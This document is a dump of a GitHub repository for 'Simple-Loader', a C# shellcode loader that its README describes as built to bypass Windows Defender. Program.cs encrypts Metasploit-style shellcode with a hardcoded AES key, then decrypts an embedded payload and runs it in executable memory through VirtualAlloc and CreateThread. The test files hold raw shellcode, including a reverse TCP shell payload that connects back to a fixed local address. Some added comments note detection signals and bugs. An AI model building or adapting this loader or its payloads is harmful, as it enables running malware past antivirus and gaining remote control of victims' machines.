├── .gitattributes
├── .gitignore
├── README.md
├── Simple-Loader.sln
├── Simple-Loader
├── App.config
├── Program.cs
├── Properties
│ └── AssemblyInfo.cs
├── Simple-Loader.csproj
├── atomic.ico
└── atomic.png
├── _config.yml
└── test
├── calc-payload.txt
└── reverse-tcp.txt
/.gitattributes:
--------------------------------------------------------------------------------
1 | ###############################################################################
2 | # Set default behavior to automatically normalize line endings.
3 | ###############################################################################
4 | * text=auto
5 |
6 | ###############################################################################
7 | # Set default behavior for command prompt diff.
8 | #
9 | # This is needed for earlier builds of msysgit that do not have it on by
10 | # default for csharp files.
11 | # Note: This is only used by command line
12 | ###############################################################################
13 | #*.cs diff=csharp
14 |
15 | ###############################################################################
16 | # Set the merge driver for project and solution files
17 | #
18 | # Merging from the command prompt will add diff markers to the files if there
19 | # are conflicts (Merging from VS is not affected by the settings below, in VS
20 | # the diff markers are never inserted). Diff markers may cause the following
21 | # file extensions to fail to load in VS. An alternative would be to treat
22 | # these files as binary and thus will always conflict and require user
23 | # intervention with every merge. To do so, just uncomment the entries below
24 | ###############################################################################
25 | #*.sln merge=binary
26 | #*.csproj merge=binary
27 | #*.vbproj merge=binary
28 | #*.vcxproj merge=binary
29 | #*.vcproj merge=binary
30 | #*.dbproj merge=binary
31 | #*.fsproj merge=binary
32 | #*.lsproj merge=binary
33 | #*.wixproj merge=binary
34 | #*.modelproj merge=binary
35 | #*.sqlproj merge=binary
36 | #*.wwaproj merge=binary
37 |
38 | ###############################################################################
39 | # behavior for image files
40 | #
41 | # image files are treated as binary by default.
42 | ###############################################################################
43 | #*.jpg binary
44 | #*.png binary
45 | #*.gif binary
46 |
47 | ###############################################################################
48 | # diff behavior for common document formats
49 | #
50 | # Convert binary document formats to text before diffing them. This feature
51 | # is only available from the command line. Turn it on by uncommenting the
52 | # entries below.
53 | ###############################################################################
54 | #*.doc diff=astextplain
55 | #*.DOC diff=astextplain
56 | #*.docx diff=astextplain
57 | #*.DOCX diff=astextplain
58 | #*.dot diff=astextplain
59 | #*.DOT diff=astextplain
60 | #*.pdf diff=astextplain
61 | #*.PDF diff=astextplain
62 | #*.rtf diff=astextplain
63 | #*.RTF diff=astextplain
64 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 |
4 | # User-specific files
5 | *.suo
6 | *.user
7 | *.userosscache
8 | *.sln.docstates
9 |
10 | # User-specific files (MonoDevelop/Xamarin Studio)
11 | *.userprefs
12 |
13 | # Build results
14 | [Dd]ebug/
15 | [Dd]ebugPublic/
16 | [Rr]elease/
17 | [Rr]eleases/
18 | x64/
19 | x86/
20 | bld/
21 | [Bb]in/
22 | [Oo]bj/
23 | [Ll]og/
24 |
25 | # Visual Studio 2015 cache/options directory
26 | .vs/
27 | # Uncomment if you have tasks that create the project's static files in wwwroot
28 | #wwwroot/
29 |
30 | # MSTest test Results
31 | [Tt]est[Rr]esult*/
32 | [Bb]uild[Ll]og.*
33 |
34 | # NUNIT
35 | *.VisualState.xml
36 | TestResult.xml
37 |
38 | # Build Results of an ATL Project
39 | [Dd]ebugPS/
40 | [Rr]eleasePS/
41 | dlldata.c
42 |
43 | # DNX
44 | project.lock.json
45 | project.fragment.lock.json
46 | artifacts/
47 |
48 | *_i.c
49 | *_p.c
50 | *_i.h
51 | *.ilk
52 | *.meta
53 | *.obj
54 | *.pch
55 | *.pdb
56 | *.pgc
57 | *.pgd
58 | *.rsp
59 | *.sbr
60 | *.tlb
61 | *.tli
62 | *.tlh
63 | *.tmp
64 | *.tmp_proj
65 | *.log
66 | *.vspscc
67 | *.vssscc
68 | .builds
69 | *.pidb
70 | *.svclog
71 | *.scc
72 |
73 | # Chutzpah Test files
74 | _Chutzpah*
75 |
76 | # Visual C++ cache files
77 | ipch/
78 | *.aps
79 | *.ncb
80 | *.opendb
81 | *.opensdf
82 | *.sdf
83 | *.cachefile
84 | *.VC.db
85 | *.VC.VC.opendb
86 |
87 | # Visual Studio profiler
88 | *.psess
89 | *.vsp
90 | *.vspx
91 | *.sap
92 |
93 | # TFS 2012 Local Workspace
94 | $tf/
95 |
96 | # Guidance Automation Toolkit
97 | *.gpState
98 |
99 | # ReSharper is a .NET coding add-in
100 | _ReSharper*/
101 | *.[Rr]e[Ss]harper
102 | *.DotSettings.user
103 |
104 | # JustCode is a .NET coding add-in
105 | .JustCode
106 |
107 | # TeamCity is a build add-in
108 | _TeamCity*
109 |
110 | # DotCover is a Code Coverage Tool
111 | *.dotCover
112 |
113 | # NCrunch
114 | _NCrunch_*
115 | .*crunch*.local.xml
116 | nCrunchTemp_*
117 |
118 | # MightyMoose
119 | *.mm.*
120 | AutoTest.Net/
121 |
122 | # Web workbench (sass)
123 | .sass-cache/
124 |
125 | # Installshield output folder
126 | [Ee]xpress/
127 |
128 | # DocProject is a documentation generator add-in
129 | DocProject/buildhelp/
130 | DocProject/Help/*.HxT
131 | DocProject/Help/*.HxC
132 | DocProject/Help/*.hhc
133 | DocProject/Help/*.hhk
134 | DocProject/Help/*.hhp
135 | DocProject/Help/Html2
136 | DocProject/Help/html
137 |
138 | # Click-Once directory
139 | publish/
140 |
141 | # Publish Web Output
142 | *.[Pp]ublish.xml
143 | *.azurePubxml
144 | # TODO: Comment the next line if you want to checkin your web deploy settings
145 | # but database connection strings (with potential passwords) will be unencrypted
146 | #*.pubxml
147 | *.publishproj
148 |
149 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
150 | # checkin your Azure Web App publish settings, but sensitive information contained
151 | # in these scripts will be unencrypted
152 | PublishScripts/
153 |
154 | # NuGet Packages
155 | *.nupkg
156 | # The packages folder can be ignored because of Package Restore
157 | **/packages/*
158 | # except build/, which is used as an MSBuild target.
159 | !**/packages/build/
160 | # Uncomment if necessary however generally it will be regenerated when needed
161 | #!**/packages/repositories.config
162 | # NuGet v3's project.json files produce more ignorable files
163 | *.nuget.props
164 | *.nuget.targets
165 |
166 | # Microsoft Azure Build Output
167 | csx/
168 | *.build.csdef
169 |
170 | # Microsoft Azure Emulator
171 | ecf/
172 | rcf/
173 |
174 | # Windows Store app package directories and files
175 | AppPackages/
176 | BundleArtifacts/
177 | Package.StoreAssociation.xml
178 | _pkginfo.txt
179 |
180 | # Visual Studio cache files
181 | # files ending in .cache can be ignored
182 | *.[Cc]ache
183 | # but keep track of directories ending in .cache
184 | !*.[Cc]ache/
185 |
186 | # Others
187 | ClientBin/
188 | ~$*
189 | *~
190 | *.dbmdl
191 | *.dbproj.schemaview
192 | *.jfm
193 | *.pfx
194 | *.publishsettings
195 | node_modules/
196 | orleans.codegen.cs
197 |
198 | # Since there are multiple workflows, uncomment next line to ignore bower_components
199 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
200 | #bower_components/
201 |
202 | # RIA/Silverlight projects
203 | Generated_Code/
204 |
205 | # Backup & report files from converting an old project file
206 | # to a newer Visual Studio version. Backup files are not needed,
207 | # because we have git ;-)
208 | _UpgradeReport_Files/
209 | Backup*/
210 | UpgradeLog*.XML
211 | UpgradeLog*.htm
212 |
213 | # SQL Server files
214 | *.mdf
215 | *.ldf
216 |
217 | # Business Intelligence projects
218 | *.rdl.data
219 | *.bim.layout
220 | *.bim_*.settings
221 |
222 | # Microsoft Fakes
223 | FakesAssemblies/
224 |
225 | # GhostDoc plugin setting file
226 | *.GhostDoc.xml
227 |
228 | # Node.js Tools for Visual Studio
229 | .ntvs_analysis.dat
230 |
231 | # Visual Studio 6 build log
232 | *.plg
233 |
234 | # Visual Studio 6 workspace options file
235 | *.opt
236 |
237 | # Visual Studio LightSwitch build output
238 | **/*.HTMLClient/GeneratedArtifacts
239 | **/*.DesktopClient/GeneratedArtifacts
240 | **/*.DesktopClient/ModelManifest.xml
241 | **/*.Server/GeneratedArtifacts
242 | **/*.Server/ModelManifest.xml
243 | _Pvt_Extensions
244 |
245 | # Paket dependency manager
246 | .paket/paket.exe
247 | paket-files/
248 |
249 | # FAKE - F# Make
250 | .fake/
251 |
252 | # JetBrains Rider
253 | .idea/
254 | *.sln.iml
255 |
256 | # CodeRush
257 | .cr/
258 |
259 | # Python Tools for Visual Studio (PTVS)
260 | __pycache__/
261 | *.pyc
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 |
2 |
4 |
5 |
6 | # Simple-Loader
7 | An extendable Shell Code Loader to Bypass Windows Defender
8 |
9 |
10 |
12 |
13 |
14 | ## Usage:
15 | See [This Post](https://sevrosecurity.com/2019/05/25/bypass-windows-defender-with-a-simple-shell-loader/) for how to use.
16 |
17 | # Contact
18 |
19 |
21 |
22 |
23 |
24 |
26 |
27 |
28 |
29 |
--------------------------------------------------------------------------------
/Simple-Loader.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 15
4 | VisualStudioVersion = 15.0.28307.572
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Simple-Loader", "Simple-Loader\Simple-Loader.csproj", "{035AE711-C0E9-41DA-A9A2-6523865E8694}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Any CPU = Debug|Any CPU
11 | Debug|x86 = Debug|x86
12 | Release|Any CPU = Release|Any CPU
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {035AE711-C0E9-41DA-A9A2-6523865E8694}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
17 | {035AE711-C0E9-41DA-A9A2-6523865E8694}.Debug|Any CPU.Build.0 = Debug|Any CPU
18 | {035AE711-C0E9-41DA-A9A2-6523865E8694}.Debug|x86.ActiveCfg = Debug|x86
19 | {035AE711-C0E9-41DA-A9A2-6523865E8694}.Debug|x86.Build.0 = Debug|x86
20 | {035AE711-C0E9-41DA-A9A2-6523865E8694}.Release|Any CPU.ActiveCfg = Release|Any CPU
21 | {035AE711-C0E9-41DA-A9A2-6523865E8694}.Release|Any CPU.Build.0 = Release|Any CPU
22 | {035AE711-C0E9-41DA-A9A2-6523865E8694}.Release|x86.ActiveCfg = Release|x86
23 | {035AE711-C0E9-41DA-A9A2-6523865E8694}.Release|x86.Build.0 = Release|x86
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {07CD72A7-4355-4C26-91E4-523CF64B2A67}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/Simple-Loader/App.config:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/Simple-Loader/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.IO;
3 | using System.Runtime.InteropServices;
4 | using System.Security.Cryptography;
5 |
6 |
7 | /*-----------------------------------------------
8 | * Simple-Loader.exe: Simple Shellcode Loader |
9 | * |
10 | * Author: @jfaust0 |
11 | * Contact: joshua.faust@sevrosecurity.com |
12 | * Website: SevroSecurity.com |
13 | * ---------------------------------------------*/
14 |
15 |
namespace goodTimes
{
    // Console utility with two modes selected by argument count:
    //   one argument  -> reads a C#-style byte[] literal from that file, AES-encrypts
    //                    it with the static key/iv below and prints it as base64;
    //   no arguments  -> base64-decodes and decrypts the embedded `hiphop` string and
    //                    executes the result in the current process via nonsense().
    // Analyst note: the key, IV, padding mode and ciphertext all live in this class,
    // so the payload is recoverable from the binary alone; the encryption is static
    // obfuscation of the on-disk file, not confidentiality against whoever holds it.
    class Program
    {
        // CHANGE THESE VALUES --> Seriously, these should not be hard coded!
        // 24-byte key and 16-byte IV, fixed at compile time and shared by both modes.
        public static byte[] key = new byte[] { 0x33, 0xED, 0x8A, 0x15, 0xD9, 0x26, 0xC5, 0x1C, 0x95, 0xF1, 0x4C, 0x11, 0xE4, 0x37, 0xD4, 0x5B, 0xE8, 0xDD, 0x8E, 0xED, 0xDC, 0x01, 0x38, 0xC7 };
        public static byte[] iv = new byte[] { 0x2B, 0x6F, 0xD1, 0xE3, 0x59, 0x6F, 0xC3, 0x31, 0x62, 0xC9, 0x98, 0x55, 0x7B, 0x00, 0xCB, 0xD1 };

        // MAIN
        // Dispatches on args.Length: 1 = encrypt mode, >1 = usage + exit(1), 0 = run mode.
        static void Main(string[] args)
        {
            String app_name = AppDomain.CurrentDomain.FriendlyName;
            // NOTE: the usage text stops after the program name; the expected argument
            // (the path of the file to encrypt) is never spelled out to the user.
            String usage = $"Usage: {app_name} ";

            // ENCRYPT PAYLOAD
            if (args.Length == 1)
            {
                if (!File.Exists($@"{args[0]}"))
                {
                    Console.WriteLine("[!] File Does Not Exist!");
                    Environment.Exit(1);
                }

                Console.WriteLine("[i] Encrypting Data");

                // Read in MetaSploit Byte[] Code from File
                // Keeps only the text between the first '{' and the next '}' (see the
                // files under test/ for the expected shape). A file without braces makes
                // the [1] index throw; that exception is not caught here.
                String fileData = System.IO.File.ReadAllText($@"{args[0]}");
                String tmp = (fileData.Split('{')[1]).Split('}')[0];

                // Translate to Byte Array
                // HexNumber permits leading/trailing whitespace, which is why the newlines
                // between the comma-separated entries in test/*.txt parse without trimming.
                string[] s = tmp.Split(',');
                byte[] data = new byte[s.Length];
                for (int i = 0; i < data.Length; i++)
                    data[i] = byte.Parse(s[i].Replace("0x", ""), System.Globalization.NumberStyles.HexNumber);

                // Encrypt and Encode the data:
                // Output is printed as a ready-to-paste C# assignment for the hiphop field.
                byte[] e_data = Encrypt(data, key, iv);
                String finalPayload = Convert.ToBase64String(e_data);
                Console.WriteLine($"[i] Replace the hiphop variable with your new payload:\n\n\t String hiphop = " + '"' + $"{finalPayload}" + '"' + ';');

                Environment.Exit(0);
            }
            // THROW EXCEPTION IF MORE THAN 1 ARG
            // (Prints usage and exits with status 1; no exception is actually thrown.)
            else if (args.Length > 1)
            {
                Console.WriteLine(usage);
                Environment.Exit(1);
            }
            // RUN PAYLOAD
            else
            {
                // msfvenom -p windows/exe cmd=calc.exe -f csharp --> CHANGE ME!
                // Base64 of the AES-encrypted payload produced by the encrypt mode above.
                // The literal as committed contains embedded spaces around some '+' and '/'
                // characters; Convert.FromBase64String ignores whitespace, so they are
                // harmless at runtime — presumably an editor/formatter artifact, verify.
                String hiphop = "ZxOy1BksVfrlq8wcmyHY8GwwiBZd8NGrGQiKvx15hcv9sQ9apoO6NGbNBxAeS4NLHSz4owcdPgQTTejYJr80Ke4ynoy41yrc5RD0uqt1ppyxDAeYGATQy7xFbN247gwFee5cPZAFyBzbI6DvOLBFSJiP64kv5T7pX3iapVsX7ORmg7Ubfa1M9PcYNm5qzS9dyHxFdeD578YA6DGYC0UPzmeDXB11R0MWmPAkRGFftQp + YdurMHce1R4HC9bQ0gtm / MLHIP / UTPbIUtwrEAqQ / SYJcJCmeCPynYLNYrn9ae1xvCBokUTgdK + gpUa58ss2F4F60p1ujZNHmQ1Bn39WZmK5R4wSVmdFJpKRZXeGycAziEVlGjsS7XDKsvQvWvaZKqealuTWxH9q6n++zrRJZ0TBorjcFHKJZOLK5bNgKx0DbmFHXz + KBH400o";

                // de_data may carry trailing 0x00 bytes: Decrypt uses PaddingMode.Zeros,
                // which is not stripped on decryption (see Decrypt below).
                byte[] de_data = Decrypt(Convert.FromBase64String(hiphop), key, iv);
                nonsense(de_data);
            }

        }

        // Shell Code Loader
        // Copies `shellcode` into a fresh RWX allocation in this process, starts a
        // thread at its first byte and blocks until that thread exits.
        // Detection note: the VirtualAlloc(PAGE_EXECUTE_READWRITE) -> Marshal.Copy ->
        // CreateThread -> WaitForSingleObject sequence on a private RWX region is the
        // textbook in-memory execution pattern that memory scanners and API-hooking
        // EDR sensors key on; a managed .NET process doing it is a strong signal.
        // Returns true after the thread finishes, false if any call threw.
        public static bool nonsense(byte[] shellcode)
        {

            try
            {
                // Return value is a UInt32 address (see the P/Invoke declarations below),
                // so this only addresses memory correctly in a 32-bit process; the
                // .csproj carries x86 configurations for that reason.
                UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,
                MEM_COMMIT, PAGE_EXECUTE_READWRITE);
                Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
                IntPtr hThread = IntPtr.Zero;
                UInt32 threadId = 0;
                IntPtr pinfo = IntPtr.Zero;

                hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
                // 0xFFFFFFFF is INFINITE: Main does not return until the payload thread ends.
                WaitForSingleObject(hThread, 0xFFFFFFFF);

                return true;
            }
            catch (Exception e)
            {
                // Only the message is reported; the failure is otherwise swallowed.
                Console.Error.WriteLine("exception: " + e.Message);
                return false;
            }
        }

        // Used to Load Shellcode into Memory:
        // Win32 constants: MEM_COMMIT for VirtualAlloc's flAllocationType,
        // PAGE_EXECUTE_READWRITE for its flProtect (a writable + executable page).
        private static UInt32 MEM_COMMIT = 0x1000;
        private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;

        // P/Invoke signatures. Pointers and handles are declared as UInt32 rather than
        // IntPtr, which pins these to 32-bit process semantics; a 64-bit build would
        // truncate the returned address.
        [DllImport("kernel32")]
        private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
        UInt32 size, UInt32 flAllocationType, UInt32 flProtect);

        [DllImport("kernel32")]
        private static extern IntPtr CreateThread(
        UInt32 lpThreadAttributes,
        UInt32 dwStackSize,
        UInt32 lpStartAddress,
        IntPtr param,
        UInt32 dwCreationFlags,
        ref UInt32 lpThreadId
        );

        [DllImport("kernel32")]
        private static extern UInt32 WaitForSingleObject(
        IntPtr hHandle,
        UInt32 dwMilliseconds
        );


        // AES-CBC encrypt `data` with `key`/`iv` and return the ciphertext.
        // NOTE(review): KeySize is set to 256, but the 24-byte `key` field is assigned
        // afterwards; assigning Key resets KeySize to the key's length, so in practice
        // this is AES-192 — confirm against the runtime if the size matters.
        // PaddingMode.Zeros pads the last block with 0x00 and is not self-describing,
        // so the original length cannot be recovered on decryption.
        public static byte[] Encrypt(byte[] data, byte[] key, byte[] iv)
        {
            using (var aes = Aes.Create())
            {
                aes.KeySize = 256;
                aes.BlockSize = 128;
                aes.Padding = PaddingMode.Zeros;

                aes.Key = key;
                aes.IV = iv;

                using (var encryptor = aes.CreateEncryptor(aes.Key, aes.IV))
                {
                    return PerformCryptography(data, encryptor);
                }
            }
        }

        // AES-CBC decrypt `data` with `key`/`iv`; mirror of Encrypt with the same
        // KeySize/BlockSize/Padding settings (and the same 24-byte-key caveat).
        // With PaddingMode.Zeros nothing is stripped after decryption, so the returned
        // array is a whole number of 16-byte blocks and may end in trailing 0x00 bytes
        // that were not part of the original input.
        public static byte[] Decrypt(byte[] data, byte[] key, byte[] iv)
        {
            using (var aes = Aes.Create())
            {
                aes.KeySize = 256;
                aes.BlockSize = 128;
                aes.Padding = PaddingMode.Zeros;

                aes.Key = key;
                aes.IV = iv;

                using (var decryptor = aes.CreateDecryptor(aes.Key, aes.IV))
                {
                    return PerformCryptography(data, decryptor);
                }
            }
        }

        // Runs `data` through `cryptoTransform` in one write and returns the
        // transformed bytes. FlushFinalBlock is what applies (or consumes) the final
        // padding block before the MemoryStream is read back.
        private static byte[] PerformCryptography(byte[] data, ICryptoTransform cryptoTransform)
        {
            using (var ms = new MemoryStream())
            using (var cryptoStream = new CryptoStream(ms, cryptoTransform, CryptoStreamMode.Write))
            {
                cryptoStream.Write(data, 0, data.Length);
                cryptoStream.FlushFinalBlock();

                return ms.ToArray();
            }
        }

    }
}
176 |
--------------------------------------------------------------------------------
/Simple-Loader/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
// NOTE: the title/product embedded in the compiled binary's version resource is
// "Good Times", not "Simple-Loader" (the .csproj assembly name); file-metadata
// based inventories or detections should expect the former.
[assembly: AssemblyTitle("Good Times")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("Good Times")]
[assembly: AssemblyCopyright("Copyright © 2019")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]

// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]

// The following GUID is for the ID of the typelib if this project is exposed to COM
// (it matches the project GUID used in Simple-Loader.sln).
[assembly: Guid("035ae711-c0e9-41da-a9a2-6523865e8694")]

// Version information for an assembly consists of the following four values:
//
// Major Version
// Minor Version
// Build Number
// Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/Simple-Loader/Simple-Loader.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | AnyCPU
7 | {035AE711-C0E9-41DA-A9A2-6523865E8694}
8 | Exe
9 | Simple_Loader
10 | Simple-Loader
11 | v4.6.1
12 | 512
13 | true
14 | true
15 |
16 |
17 | AnyCPU
18 | true
19 | full
20 | false
21 | bin\Debug\
22 | DEBUG;TRACE
23 | prompt
24 | 4
25 |
26 |
27 | AnyCPU
28 | pdbonly
29 | true
30 | bin\Release\
31 | TRACE
32 | prompt
33 | 4
34 |
35 |
36 | true
37 | bin\x86\Debug\
38 | DEBUG;TRACE
39 | full
40 | x86
41 | prompt
42 | MinimumRecommendedRules.ruleset
43 | true
44 |
45 |
46 | bin\x86\Release\
47 | TRACE
48 | true
49 | pdbonly
50 | x86
51 | prompt
52 | MinimumRecommendedRules.ruleset
53 | true
54 |
55 |
56 | atomic.ico
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
--------------------------------------------------------------------------------
/Simple-Loader/atomic.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/joshfaust/Simple-Loader/44237f57e62dd343db3e3fc8056a1ae2cb9869d8/Simple-Loader/atomic.ico
--------------------------------------------------------------------------------
/Simple-Loader/atomic.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/joshfaust/Simple-Loader/44237f57e62dd343db3e3fc8056a1ae2cb9869d8/Simple-Loader/atomic.png
--------------------------------------------------------------------------------
/_config.yml:
--------------------------------------------------------------------------------
1 | theme: jekyll-theme-midnight
--------------------------------------------------------------------------------
/test/calc-payload.txt:
--------------------------------------------------------------------------------
1 | byte[] buf = new byte[274] {
2 | 0xdb,0xd7,0xb8,0x80,0x35,0xcc,0xa2,0xd9,0x74,0x24,0xf4,0x5e,0x33,0xc9,0xb1,
3 | 0x3e,0x31,0x46,0x1a,0x83,0xc6,0x04,0x03,0x46,0x16,0xe2,0x75,0x8d,0x7e,0xcb,
4 | 0x39,0x1f,0xa4,0xc6,0x18,0xab,0x7d,0x23,0xc1,0x7d,0xb7,0x7a,0xcd,0xfe,0x84,
5 | 0x79,0x1c,0x42,0x05,0x81,0xaf,0x23,0xb7,0x81,0x00,0x7b,0xec,0x59,0xb9,0x41,
6 | 0x00,0x9e,0x86,0x92,0xe8,0x8b,0x92,0xc3,0xb6,0xaf,0x4f,0x4e,0x8a,0xb4,0xd7,
7 | 0x94,0xdd,0xfb,0x21,0x78,0xdb,0x20,0xe7,0xd1,0xcb,0x68,0x29,0x45,0x70,0x40,
8 | 0xb6,0xdc,0x6e,0xde,0x4e,0x30,0x9c,0xc8,0x27,0x64,0x44,0x65,0x2c,0x2b,0x8b,
9 | 0xab,0x5a,0x12,0x98,0xe8,0xd0,0x76,0xef,0xd3,0x10,0xa8,0x37,0x36,0x37,0x36,
10 | 0x6c,0xbc,0x98,0x45,0xf6,0xcb,0x70,0xa4,0xc6,0xd1,0x2a,0x98,0xf1,0xfb,0x78,
11 | 0x96,0x7c,0xe3,0x0a,0x24,0x97,0x64,0xdb,0x22,0xd9,0xa7,0x42,0x2f,0xa8,0x49,
12 | 0xc4,0x1b,0x81,0xbe,0x37,0x26,0x03,0xf6,0x1c,0x6c,0xd4,0x42,0x1c,0xd7,0x35,
13 | 0x5f,0x11,0xb9,0x49,0x82,0xa2,0x73,0xac,0x24,0xce,0xf1,0xf9,0xec,0xfb,0x18,
14 | 0xd8,0xb6,0x9e,0xce,0x4a,0xfa,0xeb,0x8b,0xb9,0xeb,0xe2,0xd8,0x43,0x7c,0x9f,
15 | 0x14,0xad,0x25,0x23,0xbd,0xed,0x65,0x0d,0x82,0x2a,0x45,0x57,0x4e,0x18,0x36,
16 | 0x0a,0x8c,0xfa,0xb2,0xa4,0xb7,0x63,0x93,0x49,0x1d,0x6a,0xb0,0x4d,0xc3,0x8d,
17 | 0x9b,0x32,0x05,0x8b,0xf5,0x5d,0xc5,0xb4,0x37,0xdb,0xc0,0x46,0xdb,0xa6,0x77,
18 | 0x73,0xc8,0xc1,0x8d,0x40,0x08,0xe2,0xdf,0x8e,0x39,0x6d,0x6e,0xb6,0xb1,0x7f,
19 | 0x87,0x88,0xd5,0xbe,0xac,0x97,0x7f,0x1b,0x5e,0xa8,0x04,0xc5,0xec,0x41,0x59,
20 | 0x39,0xa3,0x60,0xe9 };
--------------------------------------------------------------------------------
/test/reverse-tcp.txt:
--------------------------------------------------------------------------------
1 | byte[] buf = new byte[324] {
2 | 0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,
3 | 0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,
4 | 0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,
5 | 0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,
6 | 0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,
7 | 0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,
8 | 0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,
9 | 0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,
10 | 0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,
11 | 0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,
12 | 0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,
13 | 0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,
14 | 0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0xc0,0xa8,0x01,0xcc,0x68,
15 | 0x02,0x00,0x00,0x50,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,
16 | 0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,
17 | 0x56,0xff,0xd5,0x68,0x63,0x6d,0x64,0x00,0x89,0xe3,0x57,0x57,0x57,0x31,0xf6,
18 | 0x6a,0x12,0x59,0x56,0xe2,0xfd,0x66,0xc7,0x44,0x24,0x3c,0x01,0x01,0x8d,0x44,
19 | 0x24,0x10,0xc6,0x00,0x44,0x54,0x50,0x56,0x56,0x56,0x46,0x56,0x4e,0x56,0x56,
20 | 0x53,0x56,0x68,0x79,0xcc,0x3f,0x86,0xff,0xd5,0x89,0xe0,0x4e,0x56,0x46,0xff,
21 | 0x30,0x68,0x08,0x87,0x1d,0x60,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x68,0xa6,
22 | 0x95,0xbd,0x9d,0xff,0xd5,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,
23 | 0x47,0x13,0x72,0x6f,0x6a,0x00,0x53,0xff,0xd5 };
24 |
--------------------------------------------------------------------------------